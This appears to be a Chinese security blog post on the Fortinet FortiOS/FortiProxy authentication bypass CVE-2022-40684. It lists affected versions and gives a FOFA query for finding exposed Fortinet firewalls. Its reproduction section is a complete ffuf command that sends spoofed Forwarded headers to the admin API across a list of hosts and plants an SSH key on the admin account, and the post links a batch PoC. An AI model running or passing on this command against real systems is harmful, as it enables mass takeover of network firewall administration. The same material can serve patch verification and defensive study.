FortiOS、FortiProxy 和 FortiSwitchManager 身份验证绕过 IOC (CVE-2022-40684)

漏洞描述

Fortinet 最近修补了其 FortiOSFortiProxy FortiSwitchManager 项目中的一个关键身份验证绕过漏洞(CVE-2022-40684)。此漏洞使攻击者能够以管理员身份登录受影响的系统。为了演示本文中的漏洞,我们将使用 FortiOS 版本 7.2.1
 


 

影响版本

FortiOS 7.0.0 7.0.6
FortiOS 7.2.0 7.2.1
FortiProxy 7.0.0 7.0.6 7.2.0
 


 

FOFA

app="FORTINET-防火墙"

 


 

漏洞复现

ffuf -w "host_list.txt:URL" -u "https://URL/api/v2/cmdb/system/admin/admin" -X PUT -H 'User-Agent: Report Runner' -H 'Content-Type: application/json' -H 'Forwarded: for="[127.0.0.1]:8000";by=[127.0.0.1]:9000";' -d '{"ssh-public-key1": "h4x0r"}' -mr "SSH" -r

图片[1]-FortiOS、FortiProxy 和 FortiSwitchManager 身份验证绕过 IOC (CVE-2022-40684)-孤勇者社区

脚本批量验证
https://github.com/horizon3ai/CVE-2022-40684

POC 滥用身份验证绕过漏洞为指定用户设置 SSH 密钥。

图片[2]-FortiOS、FortiProxy 和 FortiSwitchManager 身份验证绕过 IOC (CVE-2022-40684)-孤勇者社区

------本页内容已结束,喜欢请分享------

感谢您的来访,获取更多精彩文章请收藏本站。

© 版权声明
THE END
喜欢就支持一下吧
点赞14赞赏 分享
评论 共2条
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片
    • 头像谨魔0
    • 头像后严0